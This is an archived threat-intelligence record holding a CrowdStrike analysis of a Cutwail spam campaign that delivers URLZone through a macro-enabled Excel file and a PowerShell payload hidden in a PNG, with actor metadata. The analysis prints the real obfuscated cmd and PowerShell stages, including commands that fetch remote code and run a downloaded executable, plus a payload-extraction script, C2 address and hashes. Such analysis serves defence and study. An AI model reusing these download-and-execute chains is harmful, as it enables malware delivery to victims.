{ "id": "e13a0666-927a-4050-8729-b9734c3f1e33", "created_at": "2026-04-06T00:14:50.974689Z", "updated_at": "2026-04-10T03:37:26.645988Z", "deleted_at": null, "sha1_hash": "3cd382662fa3853b903c27f54c76ad1df559d0c3", "title": "Cutwail Spam Campaign Uses Steganography to Distribute URLZone", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2004044, "plain_text": "Cutwail Spam Campaign Uses Steganography to Distribute URLZone\r\nBy sebeschbretstobexhar\r\nArchived: 2026-04-05 13:02:05 UTC\r\nCrowdStrike® CrowdStrike Falcon® Intelligence™ has observed a new Cutwail spam campaign from NARWHAL\r\nSPIDER on 24 October 2018. NARWHAL SPIDER is the adversary name designated by Falcon Intelligence for the\r\ncriminal operator of Cutwail version 2. NARWHAL SPIDER primarily provides spam services with a large customer base\r\nthat has included malware operators such as WIZARD SPIDER (developer of TrickBot), affiliates of BAMBOO SPIDER\r\n(developer of Panda Zeus), and many others including URLZone, Nymaim and Gozi ISFB. The targets and payloads\r\ndelivered through Cutwail spam campaigns are determined by the customers of NARWHAL SPIDER. The Japanese-language spam campaign uses a mixture of malicious PowerShell (PS) and steganography — a method of sending data in a\r\nconcealed format — to distribute the eCrime malware family URLZone (a.k.a. Bebloh). The Japanese-language emails\r\ncontain a malicious, macro-enabled Microsoft Excel attachment named with the pattern DOC2410201810{DIGIT\u003c6\u003e}.xls ,\r\nand have a SHA256 hash of 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e . A screenshot of this\r\nattachment is provided in Figure 1. The message body of the spam email is either blank or consists of the content provided\r\nin Table 1, which also lists the possible subject lines.\r\nTable 1. Cutwail Spam Campaign Details\r\nFigure 1. Screenshot of Malicious, Macro-enabled Microsoft Excel Document Upon opening the Excel document and\r\nenabling macros, the victim machine begins to run through the series of events detailed below.\r\nStage 1: Deobfuscation Routine\r\nThe embedded Visual Basic Application (VBA) code runs cmd.exe as shown below:\r\ncmd.exe /V:ON/C\"set lW=o.crm`VPx57^^l(SEX\u003eL8{-Y=GZU:K%0B\u003c9ia2eb*yftp_/T$j1'vdMF^|C\\Hwk^\u0026)WAIDn+}h4,sg6;3\r\nR\"\"ON\u0026\u0026for %9 in\r\nhttps://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/\r\nPage 1 of 4\n\n(15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,\r\nset Rc=!Rc!!lW:~%9,1!\u0026\u0026if %9 geq 84 cmd /C!Rc:~-1334!\"\r\nThis command decodes and executes a second stage, which is a combination of another Windows batch command with a PS\r\ncommand.\r\nStage 2: Download Image File and Execute PowerShell Command\r\nStage 2 is shown in the following code below:\r\ncmd /CEchO/ $4G7=('M'+'ATh') ; $48X7= ('SystEm.T'+'Ex'+'T'+'.ENc'+'o'+'DIng'); .(\"{1}{0}\" -f'l','sa') ('a') (\"\r\n{0}{2}{1}\" -f'New','ct','-Obje');^^^\u0026(\"{0}{1}\"-f 'Add-T','ype') -AssemblyName \"System.Drawing\";${g}=^^^\u0026('a')\r\n(\"{4}{2}{1}{0}{3}\"-f '.Bi','ing','w','tmap','System.Dra')((^^^\u0026('a') (\"{0}{1}{3}{2}\" -f\r\n'Net.','We','t','bClien')).(\"{1}{0}\" -\r\nf'penRead','O').Invoke(\"https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png\"));${O}=^^^\u0026('a') (\"{0}{1}\"-\r\nf'Byte','\u003c\u003e') 1860;(0..2)^^^|.('%'){foreach(${x} in(0..619)){${p}=${g}.(\"{0}{1}\" -f\r\n'GetPi','xel').Invoke(${x},${_});${o}\u003c${_}*620+${X}\u003e=( $4g7::(\"{1}{0}\"-f 'loor','F').Invoke((${p}.\"B\"-\r\nband15)*16)-bor(${p}.\"g\" -band 15))}};^^^\u0026(\"{0}{1}\" -f'I','EX')( ( LS vARIabLE:48x7\r\n).ValUE::\"a`scii\".\"get`s`TrInG\"(${O}\u003c0..1341\u003e)) |c:\\wIndOws\\SyStem32\\CliP.ExE \u0026\u0026CMd.Exe /c powerSHELL -\r\nExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( \\\"{0}{1}{2}\\\" -f 'Add',( \\\"{0}{1}\\\" -f'-\r\n','Typ' ),'e' ) -Assem (\\\"{3}{1}{5}{0}{4}{2}\\\" -f ( \\\"{2}{1}{0}\\\" -f'd','.Win','em' ),'ys','s','S',( \\\"{2}{1}\r\n{0}\\\"-f 'Form','.','ows'),'t') ; ^^^\u0026 ( ${e`NV`:cOMs`pec}\u003c4,15,25\u003e-jOIN'') ( ( ::(\\\"{0}{1}\\\" -f 'G',(\\\"{0}{1}\\\"\r\n-f'e','ttExT' )).\\\"i`Nv`oKE\\\"( ) ) ) ; ::(\\\"{0}{1}\\\" -f'Cl','ear' ).\\\"i`NvO`kE\\\"( )\r\nThe PS command provided above results in the following sequential actions:\r\nDownloads an image and decodes a third stage (detailed below)\r\nCopies stage 3 to the clipboard\r\nExecutes PS command to initiate stage 3\r\nThe stage 2 PS command downloads a PNG file from the URL https://images2.imgbox\u003c.\u003ecom/ca/88/A2ZSlW6S_o.png.\r\nThe downloaded image has the SHA256 hash 73da11127aa1da5538d153ba7f063c74fb90af46da581f098f179e1bb8371904 and\r\nis shown below:\r\nFigure 2. Screenshot of Downloaded Image File with Steganography to Hide the Payload Next, the command decodes\r\nhidden data using digital steganography from the image. The information is hidden in the blue (B) and green (G) channels of\r\nthe image. To be more exact, the four least significant bits of the blue and green channels contain another PS script (stage 3).\r\nThe four bits from the blue channel form the most significant bits of the data, and the four bits from the green channel form\r\nthe least significant bits to produce the full byte of the output, as shown below:\r\nhttps://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/\r\nPage 2 of 4\n\nThe following Python code extracts the PowerShell command from the image:\r\nfrom PIL import Image import sys\r\nimage = Image.open(sys.argv\u003c1\u003e) pixel = image.load() payload = bytearray() for y in xrange(3): for x in\r\nrange(620): r, g, b = pixel payload.append( (b\u002615) * 16 | (g\u002615) ) print(payload)\r\nThe stage 3 PS command is hidden in the first three rows of the image. The following image shows detail of the original\r\nimage, with the red channel removed for better visibility. It demonstrates the use of steganography, with a lower entropy in\r\nthe first three rows.\r\n Figure 3. Image\r\nShowing the Blue and Green Color Channels for the Downloaded Image containing a Hidden PowerShell Command\r\nin the First Three Rows\r\nNext, the decoded stage 3 PS command is copied to the clipboard and executed. To that end, another instance of\r\npowershell.exe is spawned by stage 2. The new PS command copies the content of the clipboard and executes it. Finally,\r\nthe clipboard content is cleared.\r\nStage 3: Further PowerShell Activity\r\nThe PS command in stage 3 is also highly obfuscated; a deobfuscated version is shown below:\r\n$Ds = Get-Culture | Format-List -Property * | Out-String -Stream; if ($Ds -Match \"ja\") { $urls =\r\n\"http\u003c:\u003e//pigertime\u003c.\u003ecom/mksettting\", \"\"; foreach ($url in $urls) { Try { write-Host $url; $fp =\r\n\"$env:temp\\pain.exe\"; Write-Host $fp; $wc = New-Object System\u003c.\u003eNet.WebClient; $wc.Headers.Add(\"user-agent\",\r\n\"Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0\r\nSafari/534.6\"); $wc.DownloadFile($url, $fp); Start-Process $fp; break } Catch { Write-Host\r\n$_.Exception.Message } } }\r\nThe obfuscated PS command first checks whether the current region settings contain the string ja . This is most likely a\r\nsuperficial regional check for the Japanese region. If this is the case, the victim machine makes an HTTP GET request to the\r\nURL http\u003c:\u003e//pigertime\u003c.\u003ecom/mksettting with the user agent Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US)\r\nAppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 . The payload is downloaded to\r\n%TEMP%\\pain.exe and executed. The downloaded payload has the SHA256 hash\r\n03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778 and is a variant of the eCrime malware\r\ndownloader URLZone.\r\nURLZone\r\nThe observed variant of URLZone is using a command-and-control (C2) server of https://oaril\u003c.\u003ecom/auth/ and the\r\npublic key provided below:\r\n-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmk6zOuYcUd1H6vUyvuxrcozqW\r\nmOl5jTa9HDodiKaPtRPmNv2rRPF/4urX476F+SM6kmLcG04lnE3bEAQzO+kJJx8x\r\ngmxESN8piJ3aSxnjAqpt3rVjmwXmoULE1wnOFCKt32UmfZ7xNaPeYJyLvgcfGMme MGuPDjhqw5LmxzzSjwIDAQAB -----END PUBLIC\r\nKEY-----\r\nhttps://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/\r\nPage 3 of 4\n\nFollowing the successful installation of URLZone, the C2 sends a request to a URL to download and execute a malicious\r\npayload. Although Falcon Intelligence has yet to observe the final payload delivered, the previous Japanese-language spam\r\ncampaigns that delivered URLZone resulted in the download of Gozi ISFB. It should be noted that CrowdStrike Falcon® is\r\nable to leverage the behavioral pattern described in this blog and provides coverage against this threat. In addition, the\r\nFalcon machine learning algorithm is able to detect and prevent the URLZone payload from executing. Cutwail spam levels\r\nin the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL\r\nSPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not\r\ncommonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk\r\nDownloader and StegoLoader.\r\nLearn more:\r\nTo learn more about how to incorporate intelligence on threat actors such as NARWHAL SPIDER into your security\r\nstrategy, please visit the Falcon threat intelligence product page.\r\nDownload the CrowdStrike 2020 Global Threat Report\r\nSource: https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/\r\nhttps://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/" ], "report_names": [ "cutwail-spam-campaign-uses-steganography-to-distribute-urlzone" ], "threat_actors": [ { "id": "c91f7778-69aa-45fa-be0e-4ee33daf8fbd", "created_at": "2023-01-06T13:46:39.110148Z", "updated_at": "2026-04-10T02:00:03.216613Z", "deleted_at": null, "main_name": "NARWHAL SPIDER", "aliases": [ "GOLD ESSEX", "TA544", "Storm-0302" ], "source_name": "MISPGALAXY:NARWHAL SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "03a8107a-f669-41af-ba79-41b1cbdc4654", "created_at": "2023-01-06T13:46:39.228649Z", "updated_at": "2026-04-10T02:00:03.25247Z", "deleted_at": null, "main_name": "BAMBOO SPIDER", "aliases": [], "source_name": "MISPGALAXY:BAMBOO SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "cc045f52-bbdb-4fcc-8fbf-a0d8a7c5e64f", "created_at": "2022-10-25T16:07:24.519535Z", "updated_at": "2026-04-10T02:00:05.019918Z", "deleted_at": null, "main_name": "Narwhal Spider", "aliases": [ "Gold Essex", "Storm-0302" ], "source_name": "ETDA:Narwhal Spider", "tools": [ "Cutwail", "Pushdo" ], "source_id": "ETDA", "reports": null }, { "id": "956fc691-b6c6-4b09-b69d-8f007c189839", "created_at": "2025-08-07T02:03:24.860251Z", "updated_at": "2026-04-10T02:00:03.656547Z", "deleted_at": null, "main_name": "GOLD ESSEX", "aliases": [ "Narwhal Spider ", "Storm-0302 ", "TA544 " ], "source_name": "Secureworks:GOLD ESSEX", "tools": [ "Cutwail", "Pony", "Pushdo" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1", "created_at": "2022-10-25T16:07:23.816991Z", "updated_at": "2026-04-10T02:00:04.758143Z", "deleted_at": null, "main_name": "Lurk", "aliases": [], "source_name": "ETDA:Lurk", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "1f679d2e-c5c9-49e9-b854-2eca06a870e4", "created_at": "2022-10-25T16:07:24.453427Z", "updated_at": "2026-04-10T02:00:04.997515Z", "deleted_at": null, "main_name": "Bamboo Spider", "aliases": [ "Bamboo Spider", "TA544" ], "source_name": "ETDA:Bamboo Spider", "tools": [ "AndroKINS", "Bebloh", "Chthonic", "DELoader", "Dofoil", "GozNym", "Gozi ISFB", "ISFB", "Nymaim", "PandaBanker", "Pandemyia", "Sharik", "Shiotob", "Smoke Loader", "SmokeLoader", "Terdot", "URLZone", "XSphinx", "ZLoader", "Zeus OpenSSL", "Zeus Panda", "Zeus Sphinx", "ZeusPanda", "nymain" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434490, "ts_updated_at": 1775792246, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.pdf", "text": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.txt", "img": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.jpg" } }